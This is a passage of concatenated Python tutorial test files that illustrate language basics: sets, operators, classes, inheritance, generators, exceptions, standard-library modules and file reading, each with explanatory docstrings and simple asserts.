fruits_set.add("pineapple") assert "pineapple" in fruits_set assert len(fruits_set) == 4 # Use remove() method to remove an item. fruits_set.remove("pineapple") assert "pineapple" not in fruits_set assert len(fruits_set) == 3 # Demonstrate set operations on unique letters from two word: first_char_set = set('abracadabra') second_char_set = set('alacazam') assert first_char_set == {'a', 'r', 'b', 'c', 'd'} # unique letters in first word assert second_char_set == {'a', 'l', 'c', 'z', 'm'} # unique letters in second word # Letters in first word but not in second. assert first_char_set - second_char_set == {'r', 'b', 'd'} # Letters in first word or second word or both. assert first_char_set | second_char_set == {'a', 'c', 'r', 'd', 'b', 'm', 'z', 'l'} # Common letters in both words. assert first_char_set & second_char_set == {'a', 'c'} # Letters in first or second word but not both. assert first_char_set ^ second_char_set == {'r', 'd', 'b', 'm', 'z', 'l'} # Similarly to list comprehensions, set comprehensions are also supported: word = {char for char in 'abracadabra' if char not in 'abc'} assert word == {'r', 'd'} File: src/user_input/test_input.py """User input @see https://docs.python.org/3/library/functions.html#input User input prompts are very helpful when it comes to interactive programming. Not only in games but also in standard file operations, you may want your user to interact with the program. Therefore, the user needs the opportunity to be able to put in information. """ def user_input(): """Input prompt""" # Printing statement to signal the user that we are waiting for input. user_input = input("Please type in your name\n") # Printing a message based on the input. print(f"Welcome, {user_input}!") File: src/standard_libraries/test_datetime.py """Dates and Times. @see: https://docs.python.org/3/tutorial/stdlib.html#dates-and-times The datetime module supplies classes for manipulating dates and times in both simple and complex ways. While date and time arithmetic is supported, the focus of the implementation is on efficient member extraction for output formatting and manipulation. The module also supports objects that are timezone aware. 
""" from datetime import date def test_datetime(): """Dates and Times""" real_now = date.today() assert real_now fake_now = date(2018, 8, 29) assert fake_now.day == 29 assert fake_now.month == 8 assert fake_now.year == 2018 assert fake_now.ctime() == 'Wed Aug 29 00:00:00 2018' assert fake_now.strftime( '%m-%d-%y. %d %b %Y is a %A on the %d day of %B.' ) == '08-29-18. 29 Aug 2018 is a Wednesday on the 29 day of August.' # Dates support calendar arithmetic. birthday = date(1964, 7, 31) age = fake_now - birthday assert age.days == 19752 File: src/standard_libraries/test_glob.py """File Wildcards. @see: https://docs.python.org/3/tutorial/stdlib.html#file-wildcards The glob module provides a function for making file lists from directory wildcard searches: """ import glob def test_glob(): """File Wildcards.""" # == operator for lists relies on the order of elements in the list. # In some cases (like on Linux Mint, python3.6) the glob() function returns list # in reverse order then it might be expected. Thus lets sort both lists before comparison # using sorted() built-in function. assert sorted(glob.glob('src/standard_libraries/glob_files/*.txt')) == sorted([ 'src/standard_libraries/glob_files/first_file.txt', 'src/standard_libraries/glob_files/second_file.txt' ]) File: src/standard_libraries/test_zlib.py """Data Compression. @see: https://docs.python.org/3/tutorial/stdlib.html#data-compression Common data archiving and compression formats are directly supported by modules including: zlib, gzip, bz2, lzma, zipfile and tarfile. """ import zlib def test_zlib(): """zlib.""" string = b'witch which has which witches wrist watch' assert len(string) == 41 zlib_compressed_string = zlib.compress(string) assert len(zlib_compressed_string) == 37 zlib_decompressed_string = zlib.decompress(zlib_compressed_string) assert zlib_decompressed_string == b'witch which has which witches wrist watch' assert zlib.crc32(string) == 226805979 File: src/standard_libraries/test_re.py """String Pattern Matching. @see: https://docs.python.org/3/tutorial/stdlib.html#string-pattern-matching The re module provides regular expression tools for advanced string processing. For complex matching and manipulation, regular expressions offer succinct, optimized solutions: """ import re def test_re(): """String Pattern Matching""" assert re.findall(r'\bf[a-z]*', 'which foot or hand fell fastest') == [ 'foot', 'fell', 'fastest' ] assert re.sub(r'(\b[a-z]+) \1', r'\1', 'cat in the the hat') == 'cat in the hat' # When only simple capabilities are needed, string methods are preferred because they are # easier to read and debug: assert 'tea for too'.replace('too', 'two') == 'tea for two' File: src/standard_libraries/test_json.py """Serialization. @see: https://www.learnpython.org/en/Serialization Python provides built-in JSON libraries to encode and decode JSON. """ import json def test_json(): """JSON serialization.""" # There are two basic formats for JSON data. Either in a string or the object data-structure. # The object data-structure, in Python, consists of lists and dictionaries nested inside each # other. The object data-structure allows one to use python methods (for lists and dictionaries) # to add, list, search and remove elements from the data-structure. The String format is mainly # used to pass the data into another program or load into a data-structure. 
person_dictionary = {'first_name': 'John', 'last_name': 'Smith', 'age': 42} assert person_dictionary['first_name'] == 'John' assert person_dictionary['age'] == 42 json_string = '{"first_name": "John", "last_name": "Smith", "age": 42}' # To load JSON back to a data structure, use the "loads" method. This method takes a string # and turns it back into the json object data-structure: person_parsed_dictionary = json.loads(json_string) assert person_parsed_dictionary == person_dictionary assert person_parsed_dictionary['first_name'] == 'John' assert person_parsed_dictionary['age'] == 42 # To encode a data structure to JSON, use the "dumps" method. This method takes an object and # returns a String: encoded_person_string = json.dumps(person_dictionary) assert encoded_person_string == json_string File: src/standard_libraries/test_math.py """Math. @see: https://docs.python.org/3/tutorial/stdlib.html#mathematics Math module is useful as many math functions are already implemented and optimized. """ import math import random import statistics def test_math(): """Math. The math module gives access to the underlying C library functions for floating point math. """ assert math.cos(math.pi / 4) == 0.70710678118654757 assert math.log(1024, 2) == 10.0 def test_random(): """Random. The random module provides tools for making random selections. """ # Choose from the list randomly. random_options = ['apple', 'pear', 'banana'] random_choice = random.choice(random_options) # i.e. 'apple' assert random_choice in random_options # Sampling without replacement. random_sample = random.sample(range(100), 10) # i.e. [30, 83, 16, 4, 8, 81, 41, 50, 18, 33] for sample in random_sample: assert 0 <= sample <= 100 # Choose random number. random_float = random.random() # i.e. 0.17970987693706186 assert 0 <= random_float <= 1 # Random integer chosen from range(6) random_integer = random.randrange(6) # i.e. 4 assert 0 <= random_integer <= 6 def test_statistics(): """Statistics. The statistics module calculates basic statistical properties (the mean, median, variance, etc.) of numeric data. """ data = [2.75, 1.75, 1.25, 0.25, 0.5, 1.25, 3.5] assert statistics.mean(data) == 1.6071428571428572 assert statistics.median(data) == 1.25 assert statistics.variance(data) == 1.3720238095238095 File: src/operators/test_bitwise.py """Bitwise operators @see: https://www.w3schools.com/python/python_operators.asp Bitwise operators manipulate numbers on bit level. """ def test_bitwise_operators(): """Bitwise operators""" # AND # Sets each bit to 1 if both bits are 1. # # Example: # 5 = 0b0101 # 3 = 0b0011 assert 5 & 3 == 1 # 0b0001 # OR # Sets each bit to 1 if one of two bits is 1. # # Example: # 5 = 0b0101 # 3 = 0b0011 assert 5 | 3 == 7 # 0b0111 # NOT # Inverts all the bits. assert ~5 == -6 # XOR # Sets each bit to 1 if only one of two bits is 1. # # Example: # 5 = 0b0101 # 3 = 0b0011 number = 5 # 0b0101 number ^= 3 # 0b0011 assert 5 ^ 3 == 6 # 0b0110 # Signed right shift # Shift right by pushing copies of the leftmost bit in from the left, and let the rightmost # bits fall off. # # Example: # 5 = 0b0101 assert 5 >> 1 == 2 # 0b0010 assert 5 >> 2 == 1 # 0b0001 # Zero fill left shift # Shift left by pushing zeros in from the right and let the leftmost bits fall off. # # Example: # 5 = 0b0101 assert 5 << 1 == 10 # 0b1010 assert 5 << 2 == 20 # 0b10100 File: src/operators/test_logical.py """Logical operators @see: https://www.w3schools.com/python/python_operators.asp Logical operators are used to combine conditional statements. 
""" def test_logical_operators(): """Logical operators""" # Let's work with these number to illustrate logic operators. first_number = 5 second_number = 10 # and # Returns True if both statements are true. assert first_number > 0 and second_number < 20 # or # Returns True if one of the statements is true assert first_number > 5 or second_number < 20 # not # Reverse the result, returns False if the result is true. # pylint: disable=unneeded-not assert not first_number == second_number assert first_number != second_number File: src/operators/test_membership.py """Membership operators @see: https://www.w3schools.com/python/python_operators.asp Membership operators are used to test if a sequence is presented in an object. """ def test_membership_operators(): """Membership operators""" # Let's use the following fruit list to illustrate membership concept. fruit_list = ["apple", "banana"] # in # Returns True if a sequence with the specified value is present in the object. # Returns True because a sequence with the value "banana" is in the list assert "banana" in fruit_list # not in # Returns True if a sequence with the specified value is not present in the object # Returns True because a sequence with the value "pineapple" is not in the list. assert "pineapple" not in fruit_list File: src/operators/test_comparison.py """Comparison operators @see: https://www.w3schools.com/python/python_operators.asp Comparison operators are used to compare two values. """ def test_comparison_operators(): """Comparison operators""" # Equal. number = 5 assert number == 5 # Not equal. number = 5 assert number != 3 # Greater than. number = 5 assert number > 3 # Less than. number = 5 assert number < 8 # Greater than or equal to number = 5 assert number >= 5 assert number >= 4 # Less than or equal to number = 5 assert number <= 5 assert number <= 6 File: src/operators/test_assigment.py """Assignment operators @see: https://www.w3schools.com/python/python_operators.asp Assignment operators are used to assign values to variables """ def test_assignment_operator(): """Assignment operator """ # Assignment: = number = 5 assert number == 5 # Multiple assignment. # The variables first_variable and second_variable simultaneously get the new values 0 and 1. first_variable, second_variable = 0, 1 assert first_variable == 0 assert second_variable == 1 # You may even switch variable values using multiple assignment. 
first_variable, second_variable = second_variable, first_variable assert first_variable == 1 assert second_variable == 0 def test_augmented_assignment_operators(): """Assignment operator combined with arithmetic and bitwise operators""" # Assignment: += number = 5 number += 3 assert number == 8 # Assignment: -= number = 5 number -= 3 assert number == 2 # Assignment: *= number = 5 number *= 3 assert number == 15 # Assignment: /= number = 8 number /= 4 assert number == 2 # Assignment: %= number = 8 number %= 3 assert number == 2 # Assignment: %= number = 5 number %= 3 assert number == 2 # Assignment: //= number = 5 number //= 3 assert number == 1 # Assignment: **= number = 5 number **= 3 assert number == 125 # Assignment: &= number = 5 # 0b0101 number &= 3 # 0b0011 assert number == 1 # 0b0001 # Assignment: |= number = 5 # 0b0101 number |= 3 # 0b0011 assert number == 7 # 0b0111 # Assignment: ^= number = 5 # 0b0101 number ^= 3 # 0b0011 assert number == 6 # 0b0110 # Assignment: >>= number = 5 number >>= 3 assert number == 0 # (((5 // 2) // 2) // 2) # Assignment: <<= number = 5 number <<= 3 assert number == 40 # 5 * 2 * 2 * 2 File: src/operators/test_identity.py """Identity operators @see: https://www.w3schools.com/python/python_operators.asp Identity operators are used to compare the objects, not if they are equal, but if they are actually the same object, with the same memory location. """ def test_identity_operators(): """Identity operators""" # Let's illustrate identity operators based on the following lists. first_fruits_list = ["apple", "banana"] second_fruits_list = ["apple", "banana"] third_fruits_list = first_fruits_list # is # Returns true if both variables are the same object. # Example: # first_fruits_list and third_fruits_list are the same objects. assert first_fruits_list is third_fruits_list # is not # Returns true if both variables are not the same object. # Example: # first_fruits_list and second_fruits_list are not the same objects, even if they have # the same content assert first_fruits_list is not second_fruits_list # To demonstrate the difference between "is" and "==": this comparison returns True because # first_fruits_list is equal to second_fruits_list. assert first_fruits_list == second_fruits_list File: src/operators/test_arithmetic.py """Arithmetic operators @see: https://www.w3schools.com/python/python_operators.asp Arithmetic operators are used with numeric values to perform common mathematical operations """ def test_arithmetic_operators(): """Arithmetic operators""" # Addition. assert 5 + 3 == 8 # Subtraction. assert 5 - 3 == 2 # Multiplication. assert 5 * 3 == 15 assert isinstance(5 * 3, int) # Division. # Result of division is float number. assert 5 / 3 == 1.6666666666666667 assert 8 / 4 == 2 assert isinstance(5 / 3, float) assert isinstance(8 / 4, float) # Modulus. assert 5 % 3 == 2 # Exponentiation. assert 5 ** 3 == 125 assert 2 ** 3 == 8 assert 2 ** 4 == 16 assert 2 ** 5 == 32 assert isinstance(5 ** 3, int) # Floor division. assert 5 // 3 == 1 assert 6 // 3 == 2 assert 7 // 3 == 2 assert 9 // 3 == 3 assert isinstance(5 // 3, int) File: src/classes/test_class_and_instance_variables.py """Class and Instance Variables. @see: https://docs.python.org/3/tutorial/classes.html#class-and-instance-variables Generally speaking, instance variables are for data unique to each instance and class variables are for attributes and methods shared by all instances of the class. 
""" def test_class_and_instance_variables(): """Class and Instance Variables.""" # pylint: disable=too-few-public-methods class Dog: """Dog class example""" kind = 'canine' # Class variable shared by all instances. def __init__(self, name): self.name = name # Instance variable unique to each instance. fido = Dog('Fido') buddy = Dog('Buddy') # Shared by all dogs. assert fido.kind == 'canine' assert buddy.kind == 'canine' # Unique to fido. assert fido.name == 'Fido' # Unique to buddy. assert buddy.name == 'Buddy' # Shared data can have possibly surprising effects with involving mutable objects such as lists # and dictionaries. For example, the tricks list in the following code should not be used as a # class variable because just a single list would be shared by all Dog instances. # pylint: disable=too-few-public-methods class DogWithSharedTricks: """Dog class example with wrong shared variable usage""" tricks = [] # Mistaken use of a class variable (see below) for mutable objects. def __init__(self, name): self.name = name # Instance variable unique to each instance. def add_trick(self, trick): """Add trick to the dog This function illustrate mistaken use of mutable class variable tricks (see below). """ self.tricks.append(trick) fido = DogWithSharedTricks('Fido') buddy = DogWithSharedTricks('Buddy') fido.add_trick('roll over') buddy.add_trick('play dead') assert fido.tricks == ['roll over', 'play dead'] # unexpectedly shared by all dogs assert buddy.tricks == ['roll over', 'play dead'] # unexpectedly shared by all dogs # Correct design of the class should use an instance variable instead: # pylint: disable=too-few-public-methods class DogWithTricks: """Dog class example""" def __init__(self, name): self.name = name # Instance variable unique to each instance. self.tricks = [] # creates a new empty list for each dog def add_trick(self, trick): """Add trick to the dog This function illustrate a correct use of mutable class variable tricks (see below). """ self.tricks.append(trick) fido = DogWithTricks('Fido') buddy = DogWithTricks('Buddy') fido.add_trick('roll over') buddy.add_trick('play dead') assert fido.tricks == ['roll over'] assert buddy.tricks == ['play dead'] File: src/classes/test_class_objects.py """Class Definition Syntax. @see: https://docs.python.org/3/tutorial/classes.html#class-objects After defining the class attributes to a class, the class object can be created by assigning the object to a variable. The created object would have instance attributes associated with it. """ def test_class_objects(): """Class Objects. Class objects support two kinds of operations: - attribute references - instantiation. """ # ATTRIBUTE REFERENCES use the standard syntax used for all attribute references in # Python: obj.name. Valid attribute names are all the names that were in the class’s namespace # when the class object was created. For class MyCounter the following references are valid # attribute references: class ComplexNumber: """Example of the complex numbers class""" real = 0 imaginary = 0 def get_real(self): """Return real part of complex number.""" return self.real def get_imaginary(self): """Return imaginary part of complex number.""" return self.imaginary assert ComplexNumber.real == 0 # __doc__ is also a valid attribute, returning the docstring belonging to the class assert ComplexNumber.__doc__ == 'Example of the complex numbers class' # Class attributes can also be assigned to, so you can change the value of # ComplexNumber.counter by assignment. 
ComplexNumber.real = 10 assert ComplexNumber.real == 10 # CLASS INSTANTIATION uses function notation. Just pretend that the class object is a # parameterless function that returns a new instance of the class. For example # (assuming the above class): complex_number = ComplexNumber() assert complex_number.real == 10 assert complex_number.get_real() == 10 # Let's change counter default value back. ComplexNumber.real = 10 assert ComplexNumber.real == 10 # The instantiation operation (“calling” a class object) creates an empty object. Many classes # like to create objects with instances customized to a specific initial state. Therefore a # class may define a special method named __init__(), like this: class ComplexNumberWithConstructor: """Example of the class with constructor""" def __init__(self, real_part, imaginary_part): self.real = real_part self.imaginary = imaginary_part def get_real(self): """Return real part of complex number.""" return self.real def get_imaginary(self): """Return imaginary part of complex number.""" return self.imaginary complex_number = ComplexNumberWithConstructor(3.0, -4.5) assert complex_number.real, complex_number.imaginary == (3.0, -4.5) File: src/classes/test_class_definition.py """Class Definition Syntax. @see: https://docs.python.org/3/tutorial/classes.html Python is an object oriented programming language. Almost everything in Python is an object, with its properties and methods. A Class is like an object constructor, or a "blueprint" for creating objects. """ def test_class_definition(): """Class definition.""" # Class definitions, like function definitions (def statements) must be executed before they # have any effect. (You could conceivably place a class definition in a branch of an if # statement, or inside a function.) class GreetingClass: """Example of the class definition This class contains two public methods and doesn't contain constructor. """ name = 'user' def say_hello(self): """Class method.""" # The self parameter is a reference to the class itself, and is used to access variables # that belongs to the class. It does not have to be named self , you can call it # whatever you like, but it has to be the first parameter of any function in the class. return 'Hello ' + self.name def say_goodbye(self): """Class method.""" return 'Goodbye ' + self.name # When a class definition is entered, a new namespace is created, and used as the local scope — # thus, all assignments to local variables go into this new namespace. In particular, function # definitions bind the name of the new function here. # Class instantiation uses function notation. Just pretend that the class object is a # parameterless function that returns a new instance of the class. For example the following # code will creates a new instance of the class and assigns this object to the local variable. greeter = GreetingClass() assert greeter.say_hello() == 'Hello user' assert greeter.say_goodbye() == 'Goodbye user' File: src/classes/test_method_objects.py """Class Definition Syntax. @see: https://docs.python.org/3/tutorial/classes.html#method-objects Classes can have two types of attribute references: data or methods. Class methods are called by [variable_name].[method_name]([parameters]) as opposed to class data which lacks the (). 
""" class MyCounter: """A simple example of the counter class""" counter = 10 def get_counter(self): """Return the counter""" return self.counter def increment_counter(self): """Increment the counter""" self.counter += 1 return self.counter def test_method_objects(): """Method Objects.""" # The other kind of instance attribute reference is a method. A method is a function that # “belongs to” an object. (In Python, the term method is not unique to class instances: other # object types can have methods as well. For example, list objects have methods called append, # insert, remove, sort, and so on. However, in the following discussion, we’ll use the term # method exclusively to mean methods of class instance objects, unless explicitly stated # otherwise.) # But be aware that counter.get_counter() is not the same thing as MyCounter.get_counter() — # it is a method object, not a function object. # Usually, a method is called right after it is bound counter = MyCounter() assert counter.get_counter() == 10 # However, it is not necessary to call a method right away: counter.get_counter() is a method # object, and can be stored away and called at a later time. For example: get_counter = counter.get_counter assert get_counter() == 10 # What exactly happens when a method is called? You may have noticed that counter.get_counter() # was called without an argument above, even though the function definition for get_counter() # specified an argument (self). What happened to the argument? Surely Python raises an # exception when a function that requires an argument is called without any — even if the # argument isn’t actually used… # Actually, you may have guessed the answer: the special thing about methods is that the # instance object is passed as the first argument of the function. In our example, the call # counter.get_counter() is exactly equivalent to MyCounter.get_counter(counter). In general, # calling a method with a list of n arguments is equivalent to calling the corresponding # function with an argument list that is created by inserting the method’s instance object # before the first argument. assert counter.get_counter() == 10 assert MyCounter.get_counter(counter) == 10 File: src/classes/test_instance_objects.py """Class Definition Syntax. @see: https://docs.python.org/3/tutorial/classes.html#instance-objects """ def test_instance_objects(): """Instance Objects. Now what can we do with instance objects? The only operations understood by instance objects are attribute references. There are two kinds of valid attribute names: - data attributes - methods. """ # DATA ATTRIBUTES need not be declared; like local variables, they spring into existence when # they are first assigned to. For example, if x is the instance of MyCounter created above, # the following piece of code will print the value 16, without leaving a trace. # pylint: disable=too-few-public-methods class DummyClass: """Dummy class""" pass dummy_instance = DummyClass() # pylint: disable=attribute-defined-outside-init dummy_instance.temporary_attribute = 1 assert dummy_instance.temporary_attribute == 1 del dummy_instance.temporary_attribute File: src/classes/test_inheritance.py """Inheritance @see: https://docs.python.org/3/tutorial/classes.html#inheritance Inheritance is one of the principles of object-oriented programming. 
Since classes may share a lot of the same code, inheritance allows a derived class to reuse the same code and modify accordingly """ # pylint: disable=too-few-public-methods class Person: """Example of the base class""" def __init__(self, name): self.name = name def get_name(self): """Get person name""" return self.name # The syntax for a derived class definition looks like this. # pylint: disable=too-few-public-methods class Employee(Person): """Example of the derived class The Base Class (in our case Person) must be defined in a scope containing the derived class definition. In place of a base class name, other arbitrary expressions are also allowed. Derived classes may override methods of their base classes. Because methods have no special privileges when calling other methods of the same object, a method of a base class that calls another method defined in the same base class may end up calling a method of a derived class that overrides it. An overriding method in a derived class may in fact want to extend rather than simply replace the base class method of the same name. There is a simple way to call the base class method directly: just call BaseClassName.methodname(self, arguments). This is occasionally useful to clients as well. (Note that this only works if the base class is accessible as BaseClassName in the global scope.) """ def __init__(self, name, staff_id): Person.__init__(self, name) # You may also use super() here in order to avoid explicit using of parent class name: # >>> super().__init__(name) self.staff_id = staff_id def get_full_id(self): """Get full employee id""" return self.get_name() + ', ' + self.staff_id def test_inheritance(): """Inheritance.""" # There’s nothing special about instantiation of derived classes: DerivedClassName() creates a # new instance of the class. Method references are resolved as follows: the corresponding class # attribute is searched, descending down the chain of base classes if necessary, and the method # reference is valid if this yields a function object. person = Person('Bill') employee = Employee('John', 'A23') assert person.get_name() == 'Bill' assert employee.get_name() == 'John' assert employee.get_full_id() == 'John, A23' # Python has two built-in functions that work with inheritance: # # - Use isinstance() to check an instance’s type: isinstance(obj, int) will be True only if # obj.__class__ is int or some class derived from int. # # - Use issubclass() to check class inheritance: issubclass(bool, int) is True since bool is # a subclass of int. However, issubclass(float, int) is False since float is not a subclass # of int. assert isinstance(employee, Employee) assert not isinstance(person, Employee) assert isinstance(person, Person) assert isinstance(employee, Person) assert issubclass(Employee, Person) assert not issubclass(Person, Employee) File: src/classes/test_multiple_inheritance.py """Multiple Inheritance @see: https://docs.python.org/3/tutorial/classes.html#multiple-inheritance Some classes may derive from multiple classes. This means that the derived class would have its attributes, along with the attributes of all the classes that it was derived from. """ def test_multiple_inheritance(): """Multiple Inheritance""" # pylint: disable=too-few-public-methods class Clock: """Clock class""" time = '11:23 PM' def get_time(self): """Get current time Method is hardcoded just for multiple inheritance illustration. 
""" return self.time # pylint: disable=too-few-public-methods class Calendar: """Calendar class""" date = '12/08/2018' def get_date(self): """Get current date Method is hardcoded just for multiple inheritance illustration. """ return self.date # Python supports a form of multiple inheritance as well. A class definition with multiple # base classes looks like this. class CalendarClock(Clock, Calendar): """Class that uses multiple inheritance. For most purposes, in the simplest cases, you can think of the search for attributes inherited from a parent class as depth-first, left-to-right, not searching twice in the same class where there is an overlap in the hierarchy. Thus, if an attribute is not found in CalendarClock, it is searched for in Clock, then (recursively) in the base classes of Clock, and if it was not found there, it was searched for in Calendar, and so on. In fact, it is slightly more complex than that; the method resolution order changes dynamically to support cooperative calls to super(). This approach is known in some other multiple-inheritance languages as call-next-method and is more powerful than the super call found in single-inheritance languages. Dynamic ordering is necessary because all cases of multiple inheritance exhibit one or more diamond relationships (where at least one of the parent classes can be accessed through multiple paths from the bottommost class). For example, all classes inherit from object, so any case of multiple inheritance provides more than one path to reach object. To keep the base classes from being accessed more than once, the dynamic algorithm linearizes the search order in a way that preserves the left-to-right ordering specified in each class, that calls each parent only once, and that is monotonic (meaning that a class can be subclassed without affecting the precedence order of its parents). """ calendar_clock = CalendarClock() assert calendar_clock.get_date() == '12/08/2018' assert calendar_clock.get_time() == '11:23 PM' File: src/additions/test_pass.py """PASS statement @see: https://docs.python.org/3/tutorial/controlflow.html The pass statement does nothing. It can be used when a statement is required syntactically but the program requires no action. """ def test_pass_in_function(): """PASS statement in function "Pass" can be used as a place-holder for a function or conditional body when you are working on new code, allowing you to keep thinking at a more abstract level. The pass statement below is silently ignored but it makes current test_pass() function valid. """ pass def test_pass_in_loop(): """PASS in loops. "Pass" can be used when a statement is required syntactically but the program requires no action. For example: """ # pylint: disable=unused-variable for number in range(100): # It just don't do anything but for loop is still valid. pass # Example above is quite useless but it was given just for illustration of the idea. # The more useful example might be: # # while True: # pass # Busy-wait for keyboard interrupt (Ctrl+C) # pylint: disable=too-few-public-methods class MyEmptyClass: """PASS statement in class "Pass" is commonly used for creating minimal classes like current one. """ pass File: src/additions/test_generators.py """Generators. @see: https://www.learnpython.org/en/Generators Generators are used to create iterators, but with a different approach. Generators are simple functions which return an iterable set of items, one at a time, in a special way. 
When an iteration over a set of item starts using the for statement, the generator is run. Once the generator's function code reaches a "yield" statement, the generator yields its execution back to the for loop, returning a new value from the set. The generator function can generate as many values (possibly infinite) as it wants, yielding each one in its turn. """ import random def lottery(): """Generator function example. Here is a simple example of a generator function which returns random integers. This function decides how to generate the random numbers on its own, and executes the yield statements one at a time, pausing in between to yield execution back to the main for loop. """ # returns first 3 random numbers between 1 and 10 # pylint: disable=unused-variable for _ in range(3): yield random.randint(1, 10) # returns a 4th number between 10 and 20 yield random.randint(10, 20) def test_generators(): """Yield statement""" for number_index, random_number in enumerate(lottery()): if number_index < 3: assert 0 <= random_number <= 10 else: assert 10 <= random_number <= 20 File: src/exceptions/test_raise_exceptions.py """Raising Exceptions. @see: https://docs.python.org/3/tutorial/errors.html#raising-exceptions The raise statement allows the programmer to force a specified exception to occur. """ def test_raise_exception(): """Raising Exceptions. The raise statement allows the programmer to force a specified exception to occur. """ exception_is_caught = False try: # The sole argument to raise indicates the exception to be raised. This must be either an # exception instance or an exception class (a class that derives from Exception). If an # exception class is passed, it will be implicitly instantiated by calling its constructor # with no arguments raise NameError('HiThere') # shorthand for 'raise ValueError()' except NameError: exception_is_caught = True assert exception_is_caught def test_user_defined_exception(): """User-defined Exceptions""" # Programs may name their own exceptions by creating a new exception class. Exceptions should # typically be derived from the Exception class, either directly or indirectly. # Most exceptions are defined with names that end in “Error,” similar to the naming of the # standard exceptions. Many standard modules define their own exceptions to report errors # that may occur in functions they define. class MyCustomError(Exception): """Example of MyCustomError exception.""" def __init__(self, message): super().__init__(message) self.message = message custom_exception_is_caught = False try: raise MyCustomError('My custom message') except MyCustomError: custom_exception_is_caught = True assert custom_exception_is_caught File: src/exceptions/test_handle_exceptions.py """Errors and Exceptions. @see: https://docs.python.org/3/tutorial/errors.html#errors-and-exceptions Even if a statement or expression is syntactically correct, it may cause an error when an attempt is made to execute it. Errors detected during execution are called exceptions and are not unconditionally fatal. It is possible to write programs that handle selected exceptions. """ def test_handle_exceptions(): """Handling of exceptions The try statement works as follows. - First, the try clause (the statement(s) between the try and except keywords) is executed. - If no exception occurs, the except clause is skipped and execution of the try statement is finished. - If an exception occurs during execution of the try clause, the rest of the clause is skipped. 
Then if its type matches the exception named after the except keyword, the except clause is executed, and then execution continues after the try statement. - If an exception occurs which does not match the exception named in the except clause, it is passed on to outer try statements; if no handler is found, it is an unhandled exception and execution stops with a message. """ # Let's simulate division by zero exception. exception_has_been_handled = False try: result = 10 * (1 / 0) # division by zero # We should not get here at all. assert result except ZeroDivisionError: # We should get here because of division by zero. exception_has_been_handled = True assert exception_has_been_handled # Let's simulate undefined variable access exception. exception_has_been_handled = False try: # pylint: disable=undefined-variable result = 4 + spam * 3 # name 'spam' is not defined # We should not get here at all. assert result except NameError: # We should get here because of division by zero. exception_has_been_handled = True assert exception_has_been_handled # A try statement may have more than one except clause, to specify handlers for different # exceptions. At most one handler will be executed. Handlers only handle exceptions that occur # in the corresponding try clause, not in other handlers of the same try statement. An except # clause may name multiple exceptions as a parenthesized tuple, for example: exception_has_been_handled = False try: result = 10 * (1 / 0) # division by zero # We should not get here at all. assert result except (ZeroDivisionError, NameError): # We should get here because of division by zero. exception_has_been_handled = True assert exception_has_been_handled # Exception handlers may be chained. exception_has_been_handled = False try: result = 10 * (1 / 0) # division by zero # We should not get here at all. assert result except NameError: # We should get here because of division by zero. exception_has_been_handled = True except ZeroDivisionError: # We should get here because of division by zero. exception_has_been_handled = True assert exception_has_been_handled # The try … except statement has an optional else clause, which, when present, must follow all # except clauses. It is useful for code that must be executed if the try clause does not raise # an exception. For example: exception_has_been_handled = False no_exceptions_has_been_fired = False try: result = 10 # We should not get here at all. assert result except NameError: # We should get here because of division by zero. exception_has_been_handled = True else: no_exceptions_has_been_fired = True assert not exception_has_been_handled assert no_exceptions_has_been_fired File: src/files/test_file_reading.py """Reading and Writing Files @see: https://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files The process of reading and writing to a file is like finding a book and opening a book. First, the file is located, opened to the first page, then reading/writing begins until it reaches the end of the file. """ def test_files_open(): """Open files open() returns a file object, and is most commonly used with two arguments: open(filename, mode). The first argument is a string containing the filename. The second argument is another string containing a few characters describing the way in which the file will be used. 
mode can be: - 'r' when the file will only be read, - 'w' for only writing (an existing file with the same name will be erased), - 'a' opens the file for appending; any data written to the file is automatically added to end. - 'r+' opens the file for both reading and writing. The mode argument is optional; 'r' will be assumed if it’s omitted. Normally, files are opened in text mode, that means, you read and write strings from and to the file, which are encoded in a specific encoding. If encoding is not specified, the default is platform dependent (see open()). 'b' appended to the mode opens the file in binary mode: now the data is read and written in the form of bytes objects. This mode should be used for all files that don’t contain text. In text mode, the default when reading is to convert platform-specific line endings (\n on Unix, \r\n on Windows) to just \n. When writing in text mode, the default is to convert occurrences of \n back to platform-specific line endings. This behind-the-scenes modification to file data is fine for text files, but will corrupt binary data like that in JPEG or EXE files. Be very careful to use binary mode when reading and writing such files. It is good practice to use the with keyword when dealing with file objects. The advantage is that the file is properly closed after its suite finishes, even if an exception is raised at some point. Using with is also much shorter than writing equivalent try-finally blocks: """ # Open files without using 'with' statement. file = open('src/files/multi_line_file.txt', 'r') assert not file.closed read_data = file.read() assert read_data == ( 'first line\n' 'second line\n' 'third line' ) file.close() assert file.closed # Open file using with. with open('src/files/multi_line_file.txt', 'r') as file: read_data = file.read() assert read_data == ( 'first line\n' 'second line\n' 'third line' ) assert file.closed # If you’re not using the with keyword, then you should call f.close() to close the file and # immediately free up any system resources used by it. If you don’t explicitly close a file, # Python’s garbage collector will eventually destroy the object and close the open file for you, # but the file may stay open for a while. Another risk is that different Python implementations # will do this clean-up at different times. File: src/files/test_file_methods.py """Methods of File Objects @see: https://docs.python.org/3/tutorial/inputoutput.html#methods-of-file-objects Reading from a file does not always have to be sequential. There are methods to look for specific locations in the file, much like flipping to a page in a book. """ def test_file_methods(): """Methods of File Objects""" multi_line_file = open('src/files/multi_line_file.txt', 'r') binary_file = open('src/files/binary_file', 'r') # To read a file’s contents, call f.read(size), which reads some quantity of data and returns # it as a string (in text mode) or bytes object (in binary mode). size is an optional numeric # argument. When size is omitted or negative, the entire contents of the file will be read and # returned; it’s your problem if the file is twice as large as your machine’s memory. Otherwise, # at most size bytes are read and returned. If the end of the file has been reached, f.read() # will return an empty string (''). read_data = multi_line_file.read() # pylint: disable=duplicate-code assert read_data == 'first line\nsecond line\nthird line' # To change the file object’s position, use f.seek(offset, from_what). 
